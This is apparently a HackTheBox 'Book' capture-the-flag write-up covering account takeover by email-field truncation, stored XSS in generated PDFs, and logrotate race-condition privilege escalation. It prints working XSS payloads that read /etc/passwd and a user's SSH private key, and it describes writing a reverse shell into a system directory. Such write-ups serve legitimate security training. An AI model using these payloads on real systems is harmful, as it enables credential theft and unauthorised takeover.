XSS stored. Logrotate.

ENUMERATION

nmap scan for services and ports

Trial and Error

  1. Enumerated whole website
  2. Signed in as abcd@example.com password -abcd
  3. Upload files, cannot be accessed
  4. Downloaded pages to create wordlist — running intruder
  5. Dirbuster can revealed Admin and login page
Dirbuster Scan

6.Nikto scan revealed same as dirbuster nothing much.

nikto scan results

7. Downloaded pdfs : Nothing of importance … tried password cracking using wordlist.. was of no use. I did not find anything, using bruteforce. I initially tried to signup as admin but was not allowed to, it showed user exists.

LOGIN IN

  1. First try to signup using name admin and email admin@book.htb, and intercept the request.
  2. Request seems to be normal, but behind the source code there was a Javascript validation form to see !name>10 characters and !email>20 characters.

So Trick here was : add spaces upto 20 characters in email field and then add arbitrary character.

REASON for doing so

  1. Email cannot be more than 20 characters — so
  2. Extra char at the end which is 21st char — will make our email look legitimately containing spaces.
  3. When 21st char will be seen it will be truncated by script and since email cannot end with spaces that too will be terminated.
  4. Leaving username admin and email admin@book.htb

So now when we login into our site we could do it easily with username admin.

Now I tried uploading an arbitrary payload file in Collections , it got uploaded but still shows require approval. So I saw “View Profile” part and found we were still USERS.

Now I tried updating it using update and intercepting request like this

But it just showed updated pop-up, but did not update it in the background, because there were two users with same name. So I tried signing in as another user.

Make it name=admin2&email=admin@book.htb A&password=12345

NOTES

  1. Change the username — as already a username admin is present
  2. Change password because Email : admin@book.htb and Password=admin combination is already present because of previous signup.

And now login into admin, we become admin

EXPLOITATION

We have Users, which has list of all users in htb who have tried signup. Let’s look what tricks other’s are trying just for fun

Now I tried going to collections part to see if our already uploaded pdf requires approval, but it was not , but it included two things

  1. Users data 2. Collections data

On viewing contents there were links to pdfs, so I uploaded a new payload named abcd.php using user account and in admin account went to download that collections pdf and found link to my uploaded pdf

The link was http://book.htb/docs/70621.pdf

Now we see we need to add book.htb to our /etc/hosts

Try opening doc

Ok, so we see anything we upload, in any format, will get changed to pdf and random number. On viewing the source of the page, it was the payload I created. But it did not get executed.

Now if we see,we can only read things in PDF format. .

  1. The file we upload changes to some random name and a pdf format, this means it gets downloaded on server requests the file from local system.
  2. Now we can upload a file and do an XSS attack to Read that local file on load.

Ok, let’s see if we can exploit this to read a file from server, something like /etc/passwd

file:///etc/passwd . Read on link : https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html. And did the same, made request via XHR(XML Http Request)

<script>x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText)}; x.open(“GET”,”file:///etc/passwd”); x.send(); </script>

Pasted this in book name filed and author field.Then uploaded any arbitrary pdf file. On admin went to collections and downloaded the pdf. Opening pdf gave me

Now what we need a reverse shell.We will copy ssh keys of user reader

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(“GET”,”file:///home/reader/.ssh/id_rsa”);x.send();</script>

Covert this to text , store as id_rsa and use to ssh reader@book.htb

I used pdf2text from github < downloaded and stored in /opt/pdfminer.six >

  • Python tools/pdf2txt 90137.pdf > id_rsa
  • Cp id_rsa ~/Downloads/htb/BOOK
  • Chmod 0700 id_rsa
Getting the shell

PRIVILEGE ESCALATION

reader@book:~/backups$ cat access.log.1

Let’s enumerate processes

Linux Enumeration. Ran lse.sh to find some vulnerabilties disclosed. Enumerated results one by one. Found Logrotate present in cron.daily

On enumeration I found — — status present in /var/lib/logrotate file runs the clean check on files .

I was not able to find any process running with root priv containing logrotate, so I took some hint, if I was doing wrong thing and if escalation need not to be done in this way.

PSPY helped me in recon hidden process

PSPY shown hidden processes

You see here /usr/sbin/logrotate -f /root/log.cfg running after every few minutes

LOGROTATE Exploitation

## Brief description

- logrotate is prone to a race condition after renaming the logfile.

- If logrotate is executed as root, with option that creates a file ( like create, copy, compress, etc.) and the user is in control of the logfile path, it is possible to abuse a race-condition to write files in ANY directory.

- An attacker could elevate his privileges by writing reverse-shells into directories like “/etc/bash_completition.d/”.

What logrotate is ? logrotate — rotates, compresses, and mails system logs

Resource to know how to exploit

SSH to get first terminal where we will run logrotate

Then on other terminal ssh reader@book.htb and writesomething to file access.log so that it’s length increases and logrotate occure

writing 10000 As to access.log so it runs to rotate logs and we can get shell

Back on 1st terminal you will see

Logrotation is done

And on terminal we ran our netcat listener

This is quite unstable to just cat out your root.txt. ROOTED !!!!

OSCP | CEH | Cyber Security Enthusiast.